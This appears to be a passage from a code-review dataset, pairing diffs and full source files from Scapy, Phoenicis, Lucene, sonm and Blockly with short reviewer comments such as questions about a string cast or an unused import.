" "Attribute missing" % session_name) if SESSION: if "conf" in SESSION: conf.configure(SESSION["conf"]) conf.session = session_name SESSION["conf"] = conf else: conf.session = session_name else: conf.session = session_name SESSION = {"conf": conf} else: SESSION = {"conf": conf} six.moves.builtins.__dict__["scapy_session"] = SESSION if mydict is not None: six.moves.builtins.__dict__["scapy_session"].update(mydict) update_ipython_session(mydict) GLOBKEYS.extend(mydict) return SESSION, GLOBKEYS ################ # Main # ################ def _prepare_quote(quote, author, max_len=78): # type: (str, str, int) -> List[str] """This function processes a quote and returns a string that is ready to be used in the fancy prompt. """ _quote = quote.split(' ') max_len -= 6 lines = [] cur_line = [] # type: List[str] def _len(line): # type: (List[str]) -> int return sum(len(elt) for elt in line) + len(line) - 1 while _quote: if not cur_line or (_len(cur_line) + len(_quote[0]) - 1 <= max_len): cur_line.append(_quote.pop(0)) continue lines.append(' | %s' % ' '.join(cur_line)) cur_line = [] if cur_line: lines.append(' | %s' % ' '.join(cur_line)) cur_line = [] lines.append(' | %s-- %s' % (" " * (max_len - len(author) - 5), author)) return lines def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # type: (Optional[Any], Optional[Any], Optional[Any], int) -> None """ Starts Scapy's console. 
""" # We're in interactive mode, let's throw the DeprecationWarnings warnings.simplefilter("always") # Set interactive mode, load the color scheme from scapy.config import conf conf.interactive = True conf.color_theme = DefaultTheme() if loglevel is not None: conf.logLevel = loglevel STARTUP_FILE = DEFAULT_STARTUP_FILE PRESTART_FILE = DEFAULT_PRESTART_FILE session_name = None if argv is None: argv = sys.argv try: opts = getopt.getopt(argv[1:], "hs:Cc:Pp:d:H") for opt, parm in opts[0]: if opt == "-h": _usage() elif opt == "-H": conf.fancy_prompt = False conf.verb = 30 elif opt == "-s": session_name = parm elif opt == "-c": STARTUP_FILE = parm elif opt == "-C": STARTUP_FILE = None elif opt == "-p": PRESTART_FILE = parm elif opt == "-P": PRESTART_FILE = None elif opt == "-d": conf.logLevel = max(1, conf.logLevel - 10) if len(opts[1]) > 0: raise getopt.GetoptError( "Too many parameters : [%s]" % " ".join(opts[1]) ) except getopt.GetoptError as msg: log_loading.error(msg) sys.exit(1) # Reset sys.argv, otherwise IPython thinks it is for him sys.argv = sys.argv[:1] SESSION, GLOBKEYS = init_session(session_name, mydict) if STARTUP_FILE: _read_config_file(STARTUP_FILE, interactive=True) if PRESTART_FILE: _read_config_file(PRESTART_FILE, interactive=True) if not conf.interactive_shell or conf.interactive_shell.lower() in [ "ipython", "auto" ]: try: import IPython from IPython import start_ipython except ImportError: log_loading.warning( "IPython not available. Using standard Python shell " "instead.\nAutoCompletion, History are disabled." 
) if WINDOWS: log_loading.warning( "On Windows, colors are also disabled" ) conf.color_theme = BlackAndWhite() IPYTHON = False else: IPYTHON = True else: IPYTHON = False if conf.fancy_prompt: from scapy.utils import get_terminal_width mini_banner = (get_terminal_width() or 84) <= 75 the_logo = [ " ", " aSPY//YASa ", " apyyyyCY//////////YCa ", " sY//////YSpcs scpCY//Pp ", " ayp ayyyyyyySCP//Pp syY//C ", " AYAsAYYYYYYYY///Ps cY//S", " pCCCCY//p cSSps y//Y", " SPPPP///a pP///AC//Y", " A//A cyP////C", " p///Ac sC///a", " P////YCpc A//A", " scccccp///pSP///p p//Y", " sY/////////y caa S//P", " cayCyayP//Ya pY/Ya", " sY/PsY////YCc aC//Yp ", " sc sccaCY//PCypaapyCP//YSs ", " spCPY//////YPSps ", " ccaacs ", " ", ] # Used on mini screens the_logo_mini = [ " .SYPACCCSASYY ", "P /SCS/CCS ACS", " /A AC", " A/PS /SPPS", " YP (SC", " SPS/A. SC", " Y/PACC PP", " PY*AYC CAA", " YYCY//SCYP ", ] the_banner = [ "", "", " |", " | Welcome to Scapy", " | Version %s" % conf.version, " |", " | https://github.com/secdev/scapy", " |", " | Have fun!", " |", ] if mini_banner: the_logo = the_logo_mini the_banner = [x[2:] for x in the_banner[3:-1]] the_banner = [""] + the_banner + [""] else: quote, author = choice(QUOTES) the_banner.extend(_prepare_quote(quote, author, max_len=39)) the_banner.append(" |") banner_text = "\n".join( logo + banner for logo, banner in six.moves.zip_longest( (conf.color_theme.logo(line) for line in the_logo), (conf.color_theme.success(line) for line in the_banner), fillvalue="" ) ) else: banner_text = "Welcome to Scapy (%s)" % conf.version if mybanner is not None: banner_text += "\n" banner_text += mybanner if IPYTHON: banner = banner_text + " using IPython %s\n" % IPython.__version__ try: from traitlets.config.loader import Config except ImportError: log_loading.warning( "traitlets not available. Some Scapy shell features won't be " "available." 
) try: start_ipython( display_banner=False, user_ns=SESSION, exec_lines=["print(\"\"\"" + banner + "\"\"\")"] ) except Exception: code.interact(banner=banner_text, local=SESSION) else: cfg = Config() try: from IPython import get_ipython if not get_ipython(): raise ImportError except ImportError: # Set "classic" prompt style when launched from # run_scapy(.bat) files Register and apply scapy # color+prompt style apply_ipython_style(shell=cfg.TerminalInteractiveShell) cfg.TerminalInteractiveShell.confirm_exit = False cfg.TerminalInteractiveShell.separate_in = u'' if int(IPython.__version__[0]) >= 6: cfg.TerminalInteractiveShell.term_title_format = ("Scapy v%s" % conf.version) # As of IPython 6-7, the jedi completion module is a dumpster # of fire that should be scrapped never to be seen again. cfg.Completer.use_jedi = False else: cfg.TerminalInteractiveShell.term_title = False cfg.HistoryAccessor.hist_file = conf.histfile cfg.InteractiveShell.banner1 = banner # configuration can thus be specified here. try: start_ipython(config=cfg, user_ns=SESSION) except (AttributeError, TypeError): code.interact(banner=banner_text, local=SESSION) else: code.interact(banner=banner_text, local=SESSION) if conf.session: save_session(conf.session, SESSION) for k in GLOBKEYS: try: del(six.moves.builtins.__dict__[k]) except Exception: pass if __name__ == "__main__": interact()
1
18,377
Why do we need to cast to `str` here?
secdev-scapy
py
@@ -17,7 +17,6 @@ import org.testfx.api.FxToolkit; public class AppConfigurationInitialisationTest { @Test - @Ignore public void testAppConfigurationInitialisation() throws TimeoutException { FxToolkit.registerPrimaryStage(); FxToolkit.setupFixture(() -> new AnnotationConfigApplicationContext(AppConfiguration.class));
1
/** * */ package org.phoenicis.javafx; import java.util.concurrent.TimeoutException; import org.junit.Ignore; import org.junit.Test; import org.springframework.context.annotation.AnnotationConfigApplicationContext; import org.testfx.api.FxToolkit; /** * @author marc * */ public class AppConfigurationInitialisationTest { @Test @Ignore public void testAppConfigurationInitialisation() throws TimeoutException { FxToolkit.registerPrimaryStage(); FxToolkit.setupFixture(() -> new AnnotationConfigApplicationContext(AppConfiguration.class)); } }
1
9,317
The ignore import above should be unused now and can be removed.
PhoenicisOrg-phoenicis
java
@@ -231,4 +231,12 @@ final class MultiTermQueryConstantScoreWrapper<Q extends MultiTermQuery> extends }; } + + @Override + public void visit(QueryVisitor visitor) { + QueryVisitor v = visitor.getSubVisitor(Occur.FILTER, this); + if (v != null) { + query.visit(v); + } + } }
1
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.lucene.search; import java.io.IOException; import java.util.ArrayList; import java.util.List; import java.util.Objects; import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.index.PostingsEnum; import org.apache.lucene.index.Term; import org.apache.lucene.index.TermState; import org.apache.lucene.index.TermStates; import org.apache.lucene.index.Terms; import org.apache.lucene.index.TermsEnum; import org.apache.lucene.search.BooleanClause.Occur; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.DocIdSetBuilder; /** * This class also provides the functionality behind * {@link MultiTermQuery#CONSTANT_SCORE_REWRITE}. * It tries to rewrite per-segment as a boolean query * that returns a constant score and otherwise fills a * bit set with matches and builds a Scorer on top of * this bit set. 
*/ final class MultiTermQueryConstantScoreWrapper<Q extends MultiTermQuery> extends Query { // mtq that matches 16 terms or less will be executed as a regular disjunction private static final int BOOLEAN_REWRITE_TERM_COUNT_THRESHOLD = 16; private static class TermAndState { final BytesRef term; final TermState state; final int docFreq; final long totalTermFreq; TermAndState(BytesRef term, TermState state, int docFreq, long totalTermFreq) { this.term = term; this.state = state; this.docFreq = docFreq; this.totalTermFreq = totalTermFreq; } } private static class WeightOrDocIdSet { final Weight weight; final DocIdSet set; WeightOrDocIdSet(Weight weight) { this.weight = Objects.requireNonNull(weight); this.set = null; } WeightOrDocIdSet(DocIdSet bitset) { this.set = bitset; this.weight = null; } } protected final Q query; /** * Wrap a {@link MultiTermQuery} as a Filter. */ protected MultiTermQueryConstantScoreWrapper(Q query) { this.query = query; } @Override public String toString(String field) { // query.toString should be ok for the filter, too, if the query boost is 1.0f return query.toString(field); } @Override public final boolean equals(final Object other) { return sameClassAs(other) && query.equals(((MultiTermQueryConstantScoreWrapper<?>) other).query); } @Override public final int hashCode() { return 31 * classHash() + query.hashCode(); } /** Returns the encapsulated query */ public Q getQuery() { return query; } /** Returns the field name for this query */ public final String getField() { return query.getField(); } @Override public Weight createWeight(IndexSearcher searcher, ScoreMode scoreMode, float boost) throws IOException { return new ConstantScoreWeight(this, boost) { /** Try to collect terms from the given terms enum and return true iff all * terms could be collected. If {@code false} is returned, the enum is * left positioned on the next term. 
*/ private boolean collectTerms(LeafReaderContext context, TermsEnum termsEnum, List<TermAndState> terms) throws IOException { final int threshold = Math.min(BOOLEAN_REWRITE_TERM_COUNT_THRESHOLD, BooleanQuery.getMaxClauseCount()); for (int i = 0; i < threshold; ++i) { final BytesRef term = termsEnum.next(); if (term == null) { return true; } TermState state = termsEnum.termState(); terms.add(new TermAndState(BytesRef.deepCopyOf(term), state, termsEnum.docFreq(), termsEnum.totalTermFreq())); } return termsEnum.next() == null; } /** * On the given leaf context, try to either rewrite to a disjunction if * there are few terms, or build a bitset containing matching docs. */ private WeightOrDocIdSet rewrite(LeafReaderContext context) throws IOException { final Terms terms = context.reader().terms(query.field); if (terms == null) { // field does not exist return new WeightOrDocIdSet((DocIdSet) null); } final TermsEnum termsEnum = query.getTermsEnum(terms); assert termsEnum != null; PostingsEnum docs = null; final List<TermAndState> collectedTerms = new ArrayList<>(); if (collectTerms(context, termsEnum, collectedTerms)) { // build a boolean query BooleanQuery.Builder bq = new BooleanQuery.Builder(); for (TermAndState t : collectedTerms) { final TermStates termStates = new TermStates(searcher.getTopReaderContext()); termStates.register(t.state, context.ord, t.docFreq, t.totalTermFreq); bq.add(new TermQuery(new Term(query.field, t.term), termStates), Occur.SHOULD); } Query q = new ConstantScoreQuery(bq.build()); final Weight weight = searcher.rewrite(q).createWeight(searcher, scoreMode, score()); return new WeightOrDocIdSet(weight); } // Too many terms: go back to the terms we already collected and start building the bit set DocIdSetBuilder builder = new DocIdSetBuilder(context.reader().maxDoc(), terms); if (collectedTerms.isEmpty() == false) { TermsEnum termsEnum2 = terms.iterator(); for (TermAndState t : collectedTerms) { termsEnum2.seekExact(t.term, t.state); docs = 
termsEnum2.postings(docs, PostingsEnum.NONE); builder.add(docs); } } // Then keep filling the bit set with remaining terms do { docs = termsEnum.postings(docs, PostingsEnum.NONE); builder.add(docs); } while (termsEnum.next() != null); return new WeightOrDocIdSet(builder.build()); } private Scorer scorer(DocIdSet set) throws IOException { if (set == null) { return null; } final DocIdSetIterator disi = set.iterator(); if (disi == null) { return null; } return new ConstantScoreScorer(this, score(), scoreMode, disi); } @Override public BulkScorer bulkScorer(LeafReaderContext context) throws IOException { final WeightOrDocIdSet weightOrBitSet = rewrite(context); if (weightOrBitSet.weight != null) { return weightOrBitSet.weight.bulkScorer(context); } else { final Scorer scorer = scorer(weightOrBitSet.set); if (scorer == null) { return null; } return new DefaultBulkScorer(scorer); } } @Override public Matches matches(LeafReaderContext context, int doc) throws IOException { final Terms terms = context.reader().terms(query.field); if (terms == null) { return null; } if (terms.hasPositions() == false) { return super.matches(context, doc); } return MatchesUtils.forField(query.field, () -> DisjunctionMatchesIterator.fromTermsEnum(context, doc, query, query.field, query.getTermsEnum(terms))); } @Override public Scorer scorer(LeafReaderContext context) throws IOException { final WeightOrDocIdSet weightOrBitSet = rewrite(context); if (weightOrBitSet.weight != null) { return weightOrBitSet.weight.scorer(context); } else { return scorer(weightOrBitSet.set); } } @Override public boolean isCacheable(LeafReaderContext ctx) { return true; } }; } }
1
28,606
redundant null check?
apache-lucene-solr
java
@@ -11,5 +11,5 @@ func NewRAMDevice() (*sonm.RAMDevice, error) { return nil, err } - return &sonm.RAMDevice{Total: m.Total}, err + return &sonm.RAMDevice{Total: m.Total, Available: m.Total}, err }
1
package ram import ( "github.com/shirou/gopsutil/mem" "github.com/sonm-io/core/proto" ) func NewRAMDevice() (*sonm.RAMDevice, error) { m, err := mem.VirtualMemory() if err != nil { return nil, err } return &sonm.RAMDevice{Total: m.Total}, err }
1
6,924
initialization of available ram is here
sonm-io-core
go
@@ -603,8 +603,12 @@ Blockly.Field.prototype.getDisplayText_ = function() { // Replace whitespace with non-breaking spaces so the text doesn't collapse. text = text.replace(/\s/g, Blockly.Field.NBSP); if (this.sourceBlock_.RTL) { - // The SVG is LTR, force text to be RTL. - text += '\u200F'; + // The SVG is LTR, force text to be RTL unless a number. + if (this.sourceBlock_.editable_ && this.sourceBlock_.type === 'math_number') { + text += '\u200E'; + } else { + text = '\u202B' + text + '\u202C'; + } } return text; };
1
/** * @license * Visual Blocks Editor * * Copyright 2012 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Field. Used for editable titles, variables, etc. * This is an abstract class that defines the UI on the block. Actual * instances would be Blockly.FieldTextInput, Blockly.FieldDropdown, etc. * @author [email protected] (Neil Fraser) */ 'use strict'; goog.provide('Blockly.Field'); goog.require('Blockly.Events.BlockChange'); goog.require('Blockly.Gesture'); goog.require('goog.asserts'); goog.require('goog.dom'); goog.require('goog.math.Size'); goog.require('goog.style'); goog.require('goog.userAgent'); /** * Abstract class for an editable field. * @param {string} text The initial content of the field. * @param {Function=} opt_validator An optional function that is called * to validate any constraints on what the user entered. Takes the new * text as an argument and returns either the accepted text, a replacement * text, or null to abort the change. * @constructor */ Blockly.Field = function(text, opt_validator) { this.size_ = new goog.math.Size( Blockly.BlockSvg.FIELD_WIDTH, Blockly.BlockSvg.FIELD_HEIGHT); this.setValue(text); this.setValidator(opt_validator); /** * Maximum characters of text to display before adding an ellipsis. * Same for strings and numbers. 
* @type {number} */ this.maxDisplayLength = Blockly.BlockSvg.MAX_DISPLAY_LENGTH; }; /** * The set of all registered fields, keyed by field type as used in the JSON * definition of a block. * @type {!Object<string, !{fromJson: Function}>} * @private */ Blockly.Field.TYPE_MAP_ = {}; /** * Registers a field type. May also override an existing field type. * Blockly.Field.fromJson uses this registry to find the appropriate field. * @param {!string} type The field type name as used in the JSON definition. * @param {!{fromJson: Function}} fieldClass The field class containing a * fromJson function that can construct an instance of the field. * @throws {Error} if the type name is empty, or the fieldClass is not an * object containing a fromJson function. */ Blockly.Field.register = function(type, fieldClass) { if (!goog.isString(type) || goog.string.isEmptyOrWhitespace(type)) { throw new Error('Invalid field type "' + type + '"'); } if (!goog.isObject(fieldClass) || !goog.isFunction(fieldClass.fromJson)) { throw new Error('Field "' + fieldClass + '" must have a fromJson function'); } Blockly.Field.TYPE_MAP_[type] = fieldClass; }; /** * Construct a Field from a JSON arg object. * Finds the appropriate registered field by the type name as registered using * Blockly.Field.register. * @param {!Object} options A JSON object with a type and options specific * to the field type. * @returns {?Blockly.Field} The new field instance or null if a field wasn't * found with the given type name * @package */ Blockly.Field.fromJson = function(options) { var fieldClass = Blockly.Field.TYPE_MAP_[options['type']]; if (fieldClass) { return fieldClass.fromJson(options); } return null; }; /** * Temporary cache of text widths. * @type {Object} * @private */ Blockly.Field.cacheWidths_ = null; /** * Number of current references to cache. * @type {number} * @private */ Blockly.Field.cacheReference_ = 0; /** * Name of field. Unique within each block. * Static labels are usually unnamed. 
* @type {string|undefined} */ Blockly.Field.prototype.name = undefined; /** * CSS class name for the text element. * @type {string} * @package */ Blockly.Field.prototype.className_ = 'blocklyText'; /** * Visible text to display. * @type {string} * @private */ Blockly.Field.prototype.text_ = ''; /** * Block this field is attached to. Starts as null, then in set in init. * @type {Blockly.Block} * @private */ Blockly.Field.prototype.sourceBlock_ = null; /** * Is the field visible, or hidden due to the block being collapsed? * @type {boolean} * @private */ Blockly.Field.prototype.visible_ = true; /** * Null, or an array of the field's argTypes (for styling). * @type {Array} * @private */ Blockly.Field.prototype.argType_ = null; /** * Validation function called when user edits an editable field. * @type {Function} * @private */ Blockly.Field.prototype.validator_ = null; /** * Non-breaking space. * @const */ Blockly.Field.NBSP = '\u00A0'; /** * Text offset used for IE/Edge. * @const */ Blockly.Field.IE_TEXT_OFFSET = '0.3em'; /** * Editable fields usually show some sort of UI for the user to change them. * @type {boolean} * @public */ Blockly.Field.prototype.EDITABLE = true; /** * Serializable fields are saved by the XML renderer, non-serializable fields * are not. Editable fields should be serialized. * @type {boolean} * @public */ Blockly.Field.prototype.SERIALIZABLE = true; /** * Attach this field to a block. * @param {!Blockly.Block} block The block containing this field. */ Blockly.Field.prototype.setSourceBlock = function(block) { goog.asserts.assert(!this.sourceBlock_, 'Field already bound to a block.'); this.sourceBlock_ = block; }; /** * Install this field on a block. */ Blockly.Field.prototype.init = function() { if (this.fieldGroup_) { // Field has already been initialized once. return; } // Build the DOM. 
this.fieldGroup_ = Blockly.utils.createSvgElement('g', {}, null); if (!this.visible_) { this.fieldGroup_.style.display = 'none'; } // Add an attribute to cassify the type of field. if (this.getArgTypes() !== null) { if (this.sourceBlock_.isShadow()) { this.sourceBlock_.svgGroup_.setAttribute('data-argument-type', this.getArgTypes()); } else { // Fields without a shadow wrapper, like square dropdowns. this.fieldGroup_.setAttribute('data-argument-type', this.getArgTypes()); } } // Adjust X to be flipped for RTL. Position is relative to horizontal start of source block. var size = this.getSize(); var fieldX = (this.sourceBlock_.RTL) ? -size.width / 2 : size.width / 2; /** @type {!Element} */ this.textElement_ = Blockly.utils.createSvgElement('text', { 'class': this.className_, 'x': fieldX, 'y': size.height / 2 + Blockly.BlockSvg.FIELD_TOP_PADDING, 'dominant-baseline': 'middle', 'dy': goog.userAgent.EDGE_OR_IE ? Blockly.Field.IE_TEXT_OFFSET : '0', 'text-anchor': 'middle' }, this.fieldGroup_); this.updateEditable(); this.sourceBlock_.getSvgRoot().appendChild(this.fieldGroup_); // Force a render. this.render_(); this.size_.width = 0; this.mouseDownWrapper_ = Blockly.bindEventWithChecks_( this.getClickTarget_(), 'mousedown', this, this.onMouseDown_); }; /** * Initializes the model of the field after it has been installed on a block. * No-op by default. */ Blockly.Field.prototype.initModel = function() { }; /** * Dispose of all DOM objects belonging to this editable field. */ Blockly.Field.prototype.dispose = function() { if (this.mouseDownWrapper_) { Blockly.unbindEvent_(this.mouseDownWrapper_); this.mouseDownWrapper_ = null; } this.sourceBlock_ = null; goog.dom.removeNode(this.fieldGroup_); this.fieldGroup_ = null; this.textElement_ = null; this.validator_ = null; }; /** * Add or remove the UI indicating if this field is editable or not. 
*/ Blockly.Field.prototype.updateEditable = function() { var group = this.fieldGroup_; if (!this.EDITABLE || !group) { return; } if (this.sourceBlock_.isEditable()) { Blockly.utils.addClass(group, 'blocklyEditableText'); Blockly.utils.removeClass(group, 'blocklyNonEditableText'); this.fieldGroup_.style.cursor = this.CURSOR; } else { Blockly.utils.addClass(group, 'blocklyNonEditableText'); Blockly.utils.removeClass(group, 'blocklyEditableText'); this.fieldGroup_.style.cursor = ''; } }; /** * Check whether this field is currently editable. Some fields are never * editable (e.g. text labels). Those fields are not serialized to XML. Other * fields may be editable, and therefore serialized, but may exist on * non-editable blocks. * @return {boolean} whether this field is editable and on an editable block */ Blockly.Field.prototype.isCurrentlyEditable = function() { return this.EDITABLE && !!this.sourceBlock_ && this.sourceBlock_.isEditable(); }; /** * Gets whether this editable field is visible or not. * @return {boolean} True if visible. */ Blockly.Field.prototype.isVisible = function() { return this.visible_; }; /** * Sets whether this editable field is visible or not. * @param {boolean} visible True if visible. */ Blockly.Field.prototype.setVisible = function(visible) { if (this.visible_ == visible) { return; } this.visible_ = visible; var root = this.getSvgRoot(); if (root) { root.style.display = visible ? 'block' : 'none'; this.render_(); } }; /** * Adds a string to the field's array of argTypes (used for styling). * @param {string} argType New argType. */ Blockly.Field.prototype.addArgType = function(argType) { if (this.argType_ == null) { this.argType_ = []; } this.argType_.push(argType); }; /** * Gets the field's argTypes joined as a string, or returns null (used for styling). * @return {string} argType string, or null. 
*/ Blockly.Field.prototype.getArgTypes = function() { if (this.argType_ === null || this.argType_.length === 0) { return null; } else { return this.argType_.join(' '); } }; /** * Sets a new validation function for editable fields. * @param {Function} handler New validation function, or null. */ Blockly.Field.prototype.setValidator = function(handler) { this.validator_ = handler; }; /** * Gets the validation function for editable fields. * @return {Function} Validation function, or null. */ Blockly.Field.prototype.getValidator = function() { return this.validator_; }; /** * Validates a change. Does nothing. Subclasses may override this. * @param {string} text The user's text. * @return {string} No change needed. */ Blockly.Field.prototype.classValidator = function(text) { return text; }; /** * Calls the validation function for this field, as well as all the validation * function for the field's class and its parents. * @param {string} text Proposed text. * @return {?string} Revised text, or null if invalid. */ Blockly.Field.prototype.callValidator = function(text) { var classResult = this.classValidator(text); if (classResult === null) { // Class validator rejects value. Game over. return null; } else if (classResult !== undefined) { text = classResult; } var userValidator = this.getValidator(); if (userValidator) { var userResult = userValidator.call(this, text); if (userResult === null) { // User validator rejects value. Game over. return null; } else if (userResult !== undefined) { text = userResult; } } return text; }; /** * Gets the group element for this editable field. * Used for measuring the size and for positioning. * @return {!Element} The group element. */ Blockly.Field.prototype.getSvgRoot = function() { return /** @type {!Element} */ (this.fieldGroup_); }; /** * Draws the border with the correct width. * Saves the computed width in a property. 
* @private */ Blockly.Field.prototype.render_ = function() { if (this.visible_ && this.textElement_) { // Replace the text. this.textElement_.textContent = this.getDisplayText_(); this.updateWidth(); // Update text centering, based on newly calculated width. var centerTextX = (this.size_.width - this.arrowWidth_) / 2; if (this.sourceBlock_.RTL) { centerTextX += this.arrowWidth_; } // In a text-editing shadow block's field, // if half the text length is not at least center of // visible field (FIELD_WIDTH), center it there instead, // unless there is a drop-down arrow. if (this.sourceBlock_.isShadow() && !this.positionArrow) { var minOffset = Blockly.BlockSvg.FIELD_WIDTH / 2; if (this.sourceBlock_.RTL) { // X position starts at the left edge of the block, in both RTL and LTR. // First offset by the width of the block to move to the right edge, // and then subtract to move to the same position as LTR. var minCenter = this.size_.width - minOffset; centerTextX = Math.min(minCenter, centerTextX); } else { // (width / 2) should exceed Blockly.BlockSvg.FIELD_WIDTH / 2 // if the text is longer. centerTextX = Math.max(minOffset, centerTextX); } } // Apply new text element x position. this.textElement_.setAttribute('x', centerTextX); } // Update any drawn box to the correct width and height. if (this.box_) { this.box_.setAttribute('width', this.size_.width); this.box_.setAttribute('height', this.size_.height); } }; /** * Updates the width of the field. This calls getCachedWidth which won't cache * the approximated width on IE/Edge when `getComputedTextLength` fails. Once * it eventually does succeed, the result will be cached. **/ Blockly.Field.prototype.updateWidth = function() { // Calculate width of field var width = Blockly.Field.getCachedWidth(this.textElement_); // Add padding to left and right of text. if (this.EDITABLE) { width += Blockly.BlockSvg.EDITABLE_FIELD_PADDING; } // Adjust width for drop-down arrows. 
this.arrowWidth_ = 0; if (this.positionArrow) { this.arrowWidth_ = this.positionArrow(width); width += this.arrowWidth_; } // Add padding to any drawn box. if (this.box_) { width += 2 * Blockly.BlockSvg.BOX_FIELD_PADDING; } // Set width of the field. this.size_.width = width; }; /** * Gets the width of a text element, caching it in the process. * @param {!Element} textElement An SVG 'text' element. * @return {number} Width of element. */ Blockly.Field.getCachedWidth = function(textElement) { var key = textElement.textContent + '\n' + textElement.className.baseVal; var width; // Return the cached width if it exists. if (Blockly.Field.cacheWidths_) { width = Blockly.Field.cacheWidths_[key]; if (width) { return width; } } // Attempt to compute fetch the width of the SVG text element. try { if (goog.userAgent.IE || goog.userAgent.EDGE) { width = textElement.getBBox().width; } else { width = textElement.getComputedTextLength(); } } catch (e) { // In other cases where we fail to geth the computed text. Instead, use an // approximation and do not cache the result. At some later point in time // when the block is inserted into the visible DOM, this method will be // called again and, at that point in time, will not throw an exception. return textElement.textContent.length * 8; } // Cache the computed width and return. if (Blockly.Field.cacheWidths_) { Blockly.Field.cacheWidths_[key] = width; } return width; }; /** * Start caching field widths. Every call to this function MUST also call * stopCache. Caches must not survive between execution threads. */ Blockly.Field.startCache = function() { Blockly.Field.cacheReference_++; if (!Blockly.Field.cacheWidths_) { Blockly.Field.cacheWidths_ = {}; } }; /** * Stop caching field widths. Unless caching was already on when the * corresponding call to startCache was made. 
*/ Blockly.Field.stopCache = function() { Blockly.Field.cacheReference_--; if (!Blockly.Field.cacheReference_) { Blockly.Field.cacheWidths_ = null; } }; /** * Returns the height and width of the field. * @return {!goog.math.Size} Height and width. */ Blockly.Field.prototype.getSize = function() { if (!this.size_.width) { this.render_(); } return this.size_; }; /** * Returns the bounding box of the rendered field, accounting for workspace * scaling. * @return {!Object} An object with top, bottom, left, and right in pixels * relative to the top left corner of the page (window coordinates). * @private */ Blockly.Field.prototype.getScaledBBox_ = function() { var size = this.getSize(); var scaledHeight = size.height * this.sourceBlock_.workspace.scale; var scaledWidth = size.width * this.sourceBlock_.workspace.scale; var xy = this.getAbsoluteXY_(); return { top: xy.y, bottom: xy.y + scaledHeight, left: xy.x, right: xy.x + scaledWidth }; }; /** * Get the text from this field as displayed on screen. May differ from getText * due to ellipsis, and other formatting. * @return {string} Currently displayed text. * @private */ Blockly.Field.prototype.getDisplayText_ = function() { var text = this.text_; if (!text) { // Prevent the field from disappearing if empty. return Blockly.Field.NBSP; } if (text.length > this.maxDisplayLength) { // Truncate displayed string and add an ellipsis ('...'). text = text.substring(0, this.maxDisplayLength - 2) + '\u2026'; } // Replace whitespace with non-breaking spaces so the text doesn't collapse. text = text.replace(/\s/g, Blockly.Field.NBSP); if (this.sourceBlock_.RTL) { // The SVG is LTR, force text to be RTL. text += '\u200F'; } return text; }; /** * Get the text from this field. * @return {string} Current text. */ Blockly.Field.prototype.getText = function() { return this.text_; }; /** * Set the text in this field. Trigger a rerender of the source block. * @param {*} newText New text. 
*/ Blockly.Field.prototype.setText = function(newText) { if (newText === null) { // No change if null. return; } newText = String(newText); if (newText === this.text_) { // No change. return; } this.text_ = newText; this.forceRerender(); }; /** * Force a rerender of the block that this field is installed on, which will * rerender this field and adjust for any sizing changes. * Other fields on the same block will not rerender, because their sizes have * already been recorded. * @package */ Blockly.Field.prototype.forceRerender = function() { // Set width to 0 to force a rerender of this field. this.size_.width = 0; if (this.sourceBlock_ && this.sourceBlock_.rendered) { this.sourceBlock_.render(); this.sourceBlock_.bumpNeighbours_(); } }; /** * Update the text node of this field to display the current text. * @private */ Blockly.Field.prototype.updateTextNode_ = function() { if (!this.textElement_) { // Not rendered yet. return; } var text = this.text_; if (text.length > this.maxDisplayLength) { // Truncate displayed string and add an ellipsis ('...'). text = text.substring(0, this.maxDisplayLength - 2) + '\u2026'; // Add special class for sizing font when truncated this.textElement_.setAttribute('class', this.className_ + ' blocklyTextTruncated'); } else { this.textElement_.setAttribute('class', this.className_); } // Empty the text element. goog.dom.removeChildren(/** @type {!Element} */ (this.textElement_)); // Replace whitespace with non-breaking spaces so the text doesn't collapse. text = text.replace(/\s/g, Blockly.Field.NBSP); if (this.sourceBlock_.RTL && text) { // The SVG is LTR, force text to be RTL. text += '\u200F'; } if (!text) { // Prevent the field from disappearing if empty. text = Blockly.Field.NBSP; } var textNode = document.createTextNode(text); this.textElement_.appendChild(textNode); // Cached width is obsolete. Clear it. 
this.size_.width = 0; }; /** * By default there is no difference between the human-readable text and * the language-neutral values. Subclasses (such as dropdown) may define this. * @return {string} Current value. */ Blockly.Field.prototype.getValue = function() { return this.getText(); }; /** * By default there is no difference between the human-readable text and * the language-neutral values. Subclasses (such as dropdown) may define this. * @param {string} newValue New value. */ Blockly.Field.prototype.setValue = function(newValue) { if (newValue === null) { // No change if null. return; } var oldValue = this.getValue(); if (oldValue == newValue) { return; } if (this.sourceBlock_ && Blockly.Events.isEnabled()) { Blockly.Events.fire(new Blockly.Events.BlockChange( this.sourceBlock_, 'field', this.name, oldValue, newValue)); } this.setText(newValue); }; /** * Handle a mouse down event on a field. * @param {!Event} e Mouse down event. * @private */ Blockly.Field.prototype.onMouseDown_ = function(e) { if (!this.sourceBlock_ || !this.sourceBlock_.workspace) { return; } var gesture = this.sourceBlock_.workspace.getGesture(e); if (gesture) { gesture.setStartField(this); } }; /** * Change the tooltip text for this field. * @param {string|!Element} _newTip Text for tooltip or a parent element to * link to for its tooltip. * @abstract */ Blockly.Field.prototype.setTooltip = function(_newTip) { // Non-abstract sub-classes may wish to implement this. See FieldLabel. }; /** * Select the element to bind the click handler to. When this element is * clicked on an editable field, the editor will open. * * If the block has only one field and no output connection, we handle clicks * over the whole block. Otherwise, handle clicks over the the group containing * the field. * * @return {!Element} Element to bind click handler to. 
